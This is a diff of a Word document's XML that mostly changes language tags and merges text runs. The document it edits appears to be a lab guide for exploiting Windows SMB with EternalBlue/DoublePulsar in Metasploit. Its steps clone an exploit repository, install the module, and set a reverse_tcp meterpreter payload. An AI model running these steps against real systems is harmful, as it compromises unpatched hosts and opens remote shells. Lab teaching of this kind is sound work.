+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>smb</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -2870,43 +2774,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>windows</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>smb</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>eternalblue_doublepulsar</w:t>
       </w:r>
@@ -2922,50 +2790,32 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">set </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>payload</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>set payload payload/windows/x64/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -2974,43 +2824,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>windows</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/x64/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>reverse_tcp</w:t>
       </w:r>
@@ -3212,14 +3026,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>set DOUBLEPULSARPATH /home/osboxes/EternalBlue/Eternalblue-Doublepulsar-Metasploit/deps/</w:t>
       </w:r>
@@ -3234,14 +3048,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>set ETERNALBLUEPATH /home/osboxes/EternalBlue/Eternalblue-Doublepulsar-Metasploit/deps/</w:t>
       </w:r>
@@ -3256,14 +3070,14 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>set WINEPATH /home/</w:t>
       </w:r>
@@ -3272,34 +3086,26 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>osboxes</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/.</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>wine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/.wine</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -3308,7 +3114,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>drive_c</w:t>
       </w:r>
@@ -3317,7 +3123,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>/</w:t>
       </w:r>
@@ -4208,120 +4014,14 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Clone</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>required</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (Default </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>ones</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>don't</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>reliably</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>)</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Clone the required exploit (Default ones don't reliably exploit)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4334,34 +4034,16 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">git </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>clone</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> https://github.com/w0rtw0rt/EternalBlue</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>git clone https://github.com/w0rtw0rt/EternalBlue</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4372,84 +4054,28 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t xml:space="preserve">Start </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>metasploit</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>framework</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>once</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>initialize</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> database</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> framework once to initialize database</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4506,78 +4132,28 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>Place</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Place </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>eternalblue-doublepulsar.rb</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> file </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>into</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>the</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exploits</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> folder</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> file into the exploits folder</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4590,15 +4166,15 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>sudo</w:t>
       </w:r>
@@ -4607,34 +4183,16 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>cp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> EternalBlue/Eternalblue-Doublepulsar-Metasploit/eternalblue-doublepulsar.rb /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> cp EternalBlue/Eternalblue-Doublepulsar-Metasploit/eternalblue-doublepulsar.rb /</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>usr</w:t>
       </w:r>
@@ -4643,7 +4201,7 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>/share/</w:t>
       </w:r>
@@ -4652,61 +4210,25 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>metasploit-framework</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/modules/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>exploits</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>windows</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>metasploit</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-framework/modules/exploits/windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>smb</w:t>
       </w:r>
@@ -4748,15 +4270,15 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>sudo</w:t>
       </w:r>
@@ -4765,63 +4287,9 @@
         <w:rPr>
           <w:i/>
           <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>apt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">-get </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>install</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>wine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -y</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> apt-get install wine -y</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4832,56 +4300,14 @@
           <w:numId w:val="11"/>
         </w:numPr>
         <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Run </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>wine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>to</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> make </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>required</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> directories</w:t>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Run wine to make required directories</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5184,32 +4610,208 @@
         <w:rPr>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t xml:space="preserve"># Append </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
-        </w:rPr>
-        <w:t>VirtualBox’s</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="nl-BE"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># Append VirtualBox’s installation directory to the PATH environment variable to make things easier</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>$</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Env:Path</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> += ";C:\Program Files\Oracle\VirtualBox\"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>#------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t># 1. Setup Nat Network</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
